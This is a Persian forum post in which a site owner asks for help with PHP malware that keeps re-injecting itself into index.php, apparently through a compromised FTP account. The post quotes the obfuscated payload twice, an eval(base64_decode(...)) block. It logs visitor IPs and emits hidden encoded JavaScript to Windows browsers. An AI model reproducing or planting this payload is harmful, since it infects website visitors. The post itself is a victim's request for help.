mohammad6006
April 28th, 2013, 01:45
نمیدونم با این مشکل باید چیکار کنم
نمیدونم از اف تی پی کدوم یوزر یه ویروسی افتاده که این کد روی index.php وارد میکنه
مثلا نمونه کد:
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG lwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOw0KJGRyPSRfU0VS VkVSWyJET0NVTUVOVF9ST09UIl07DQokdWEgPSAkX1NFUlZFUl snSFRUUF9VU0VSX0FHRU5UJ107DQokb2RiZiA9ICRkci4nLycu bWQ1KGRhdGUoJ20uZC55JywgdGltZSgpLTg2NDAwKSk7DQppZi AoZmlsZV9leGlzdHMoJG9kYmYpKUB1bmxpbmsoJG9kYmYpOw0K JGRiZj0kZHIuJy8nLm1kNShkYXRlKCdtLmQueScpKTsNCmlmKC hzdHJwb3MoJHVhLCdXaW5kb3dzJykhPT1mYWxzZSkmJigoc3Ry cG9zKCR1YSwnTVNJRScpIT09ZmFsc2UpfHwoc3RycG9zKCR1YS wnT3BlcmEnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVm b3gnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ1NhZmFyaScpIT 09ZmFsc2UpKSYmKHN0cnBvcyhAZmlsZV9nZXRfY29udGVudHMo JGRiZiksJGlwKSA9PT0gZmFsc2UpKSB7DQogICAgZWNobyhiYX NlNjRfZGVjb2RlKCdQSE5qY21sd2RENTNkejEzYVc1a2IzYzdk ajBpZGlJckltRnNJanRwWmloM2R5NWtiMk4xYldWdWRDbDBjbm w3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtjMmR6 WkdjcGUyRnpaRDB3TzNSeWVYdGtQV1J2WTNWdFpXNTBmV05oZE dOb0tHRm5aSE5uS1h0aGMyUTlNVHQ5YVdZb0lXRnpaQ2w3ZHox N1lUcDNkMzB1WVR0MlBTSmxJaTVqYjI1allYUW9kaWs3ZlgxbF BYZGJkbDA3YVdZb01TbDdaajF1WlhjZ1FYSnlZWGtvTVRBd0xE RXhNQ3c1Tnl3eE1UUXNNVEE1TERFd01Dd3hNRGdzTVRFekxEUT JMREV4T0N3eE1USXNNVEF5TERFeE5pd3hNREFzTXpnc016RXNO akFzTVRBMExERXdNQ3d4TVRFc09UY3NNVEE0TERrNUxESTVMRE V4TlN3eE1UVXNNVEU1TERFd05Td3hNREVzTmpBc09UQXNNekVz TVRFeUxERXhNQ3d4TVRNc01UQXlMREV4Tml3eE1EUXNNVEE1TE RFd055dzFPQ3d4TURFc01UQXpMREV4Tnl3eE1ERXNPVGtzTlRj c01URXpMREV4TVN3eE1URXNOVFlzTkRVc01URXlMREV4T1N3MU 55d3hNRFVzTVRBeExERXdNU3d4TVRRc05UVXNORFVzTlRJc05E WXNORFVzTVRFeUxERXhPU3cxTnl3NE9Td3pOQ3d6TVN3eE1UTX NNVEV4TERrNUxEWXdMRGt3TERNeExERXdOQ3d4TVRVc01URTBM REV3T1N3MU9DdzBOaXcwTlN3eE1EQXNNVEV4TERFeE9Dd3hNRE FzTVRFd0xERXlNaXd4TURBc09UZ3NNVEUxTERFeE15dzBOU3d4 TVRNc09UZ3NNVEUwTERFeE55dzVPU3d4TVRRc01URTFMREV3TU N3eE1USXNORE1zT1Rrc01URXdMREV3Tnl3ME5DdzVPU3d4TVRB c01URTFMREV3Tnl3eE1UWXNNVEF3TERFeE1pdzBOQ3d4TVRVc0 1URTFMRGsxTERFeE15d3hNVFVzTkRVc01URXdMREV3TVN3eE1U SXNPVEVzTXpJc01qa3NNVEEwTERFd01Dd3hNRE1zTVRBd0xERX dOQ3d4TVRVc05Ua3NPRGtzTXpRc05USXNORFlzT0Rrc016UXNN ekVzTVRFM0xERXdNaXd4TURBc01URTFMREV3TWl3MU9DdzVNaX d6TXl3ME55dzBOU3cwT0N3NU1Td3pNaXcxT1N3Mk1DdzBOaXd4 TURNc09Ua3NNVEUwTERrMkxERXdOeXc1T0N3Mk1pd3pNeXd6T1 N3MU5pazdmWGM5Wmp0elBWdGRPMlp2Y2locFBUQTdMV2tyTVRZ NElUMHdPMmtyUFRFcGUybzlhVHRwWmlnb01ETXhQVDB3ZURFNU tTbHBaaWhsS1hNOWN5dFRkSEpwYm1jdVpuSnZiVU5vWVhKRGIy UmxLQ2d4S25kYmFsMHJaU2dpYWlVMElpa3BLVHQ5ZUhvOVpUdD Bjbmw3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtj MmRrS1h0NGVpaHpLWDA4TDNOamNtbHdkRDQ9JykpOw0KICAgIG lmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpIHsNCiAgICAg ICAgZnB1dHMoJGZwICwgJGlwLid8Jyk7DQogICAgICAgIGZjbG 9zZSgkZnApOw0KICAgIH0NCn0='));
دکودش هم کردم اما نتونستم ریشه ی اینو پیدا کنم تا کلا پاکش کنم
چون مثلا من این کد رو از این فایل پاک کنم دوباره بعد از چند دقیقه اینجکت میشه
نمیدونم از اف تی پی کدوم یوزر یه ویروسی افتاده که این کد روی index.php وارد میکنه
مثلا نمونه کد:
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG lwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOw0KJGRyPSRfU0VS VkVSWyJET0NVTUVOVF9ST09UIl07DQokdWEgPSAkX1NFUlZFUl snSFRUUF9VU0VSX0FHRU5UJ107DQokb2RiZiA9ICRkci4nLycu bWQ1KGRhdGUoJ20uZC55JywgdGltZSgpLTg2NDAwKSk7DQppZi AoZmlsZV9leGlzdHMoJG9kYmYpKUB1bmxpbmsoJG9kYmYpOw0K JGRiZj0kZHIuJy8nLm1kNShkYXRlKCdtLmQueScpKTsNCmlmKC hzdHJwb3MoJHVhLCdXaW5kb3dzJykhPT1mYWxzZSkmJigoc3Ry cG9zKCR1YSwnTVNJRScpIT09ZmFsc2UpfHwoc3RycG9zKCR1YS wnT3BlcmEnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVm b3gnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ1NhZmFyaScpIT 09ZmFsc2UpKSYmKHN0cnBvcyhAZmlsZV9nZXRfY29udGVudHMo JGRiZiksJGlwKSA9PT0gZmFsc2UpKSB7DQogICAgZWNobyhiYX NlNjRfZGVjb2RlKCdQSE5qY21sd2RENTNkejEzYVc1a2IzYzdk ajBpZGlJckltRnNJanRwWmloM2R5NWtiMk4xYldWdWRDbDBjbm w3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtjMmR6 WkdjcGUyRnpaRDB3TzNSeWVYdGtQV1J2WTNWdFpXNTBmV05oZE dOb0tHRm5aSE5uS1h0aGMyUTlNVHQ5YVdZb0lXRnpaQ2w3ZHox N1lUcDNkMzB1WVR0MlBTSmxJaTVqYjI1allYUW9kaWs3ZlgxbF BYZGJkbDA3YVdZb01TbDdaajF1WlhjZ1FYSnlZWGtvTVRBd0xE RXhNQ3c1Tnl3eE1UUXNNVEE1TERFd01Dd3hNRGdzTVRFekxEUT JMREV4T0N3eE1USXNNVEF5TERFeE5pd3hNREFzTXpnc016RXNO akFzTVRBMExERXdNQ3d4TVRFc09UY3NNVEE0TERrNUxESTVMRE V4TlN3eE1UVXNNVEU1TERFd05Td3hNREVzTmpBc09UQXNNekVz TVRFeUxERXhNQ3d4TVRNc01UQXlMREV4Tml3eE1EUXNNVEE1TE RFd055dzFPQ3d4TURFc01UQXpMREV4Tnl3eE1ERXNPVGtzTlRj c01URXpMREV4TVN3eE1URXNOVFlzTkRVc01URXlMREV4T1N3MU 55d3hNRFVzTVRBeExERXdNU3d4TVRRc05UVXNORFVzTlRJc05E WXNORFVzTVRFeUxERXhPU3cxTnl3NE9Td3pOQ3d6TVN3eE1UTX NNVEV4TERrNUxEWXdMRGt3TERNeExERXdOQ3d4TVRVc01URTBM REV3T1N3MU9DdzBOaXcwTlN3eE1EQXNNVEV4TERFeE9Dd3hNRE FzTVRFd0xERXlNaXd4TURBc09UZ3NNVEUxTERFeE15dzBOU3d4 TVRNc09UZ3NNVEUwTERFeE55dzVPU3d4TVRRc01URTFMREV3TU N3eE1USXNORE1zT1Rrc01URXdMREV3Tnl3ME5DdzVPU3d4TVRB c01URTFMREV3Tnl3eE1UWXNNVEF3TERFeE1pdzBOQ3d4TVRVc0 1URTFMRGsxTERFeE15d3hNVFVzTkRVc01URXdMREV3TVN3eE1U SXNPVEVzTXpJc01qa3NNVEEwTERFd01Dd3hNRE1zTVRBd0xERX dOQ3d4TVRVc05Ua3NPRGtzTXpRc05USXNORFlzT0Rrc016UXNN ekVzTVRFM0xERXdNaXd4TURBc01URTFMREV3TWl3MU9DdzVNaX d6TXl3ME55dzBOU3cwT0N3NU1Td3pNaXcxT1N3Mk1DdzBOaXd4 TURNc09Ua3NNVEUwTERrMkxERXdOeXc1T0N3Mk1pd3pNeXd6T1 N3MU5pazdmWGM5Wmp0elBWdGRPMlp2Y2locFBUQTdMV2tyTVRZ NElUMHdPMmtyUFRFcGUybzlhVHRwWmlnb01ETXhQVDB3ZURFNU tTbHBaaWhsS1hNOWN5dFRkSEpwYm1jdVpuSnZiVU5vWVhKRGIy UmxLQ2d4S25kYmFsMHJaU2dpYWlVMElpa3BLVHQ5ZUhvOVpUdD Bjbmw3Wkc5amRXMWxiblF1WW05a2VTc3JmV05oZEdOb0tHZGtj MmRrS1h0NGVpaHpLWDA4TDNOamNtbHdkRDQ9JykpOw0KICAgIG lmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpIHsNCiAgICAg ICAgZnB1dHMoJGZwICwgJGlwLid8Jyk7DQogICAgICAgIGZjbG 9zZSgkZnApOw0KICAgIH0NCn0='));
دکودش هم کردم اما نتونستم ریشه ی اینو پیدا کنم تا کلا پاکش کنم
چون مثلا من این کد رو از این فایل پاک کنم دوباره بعد از چند دقیقه اینجکت میشه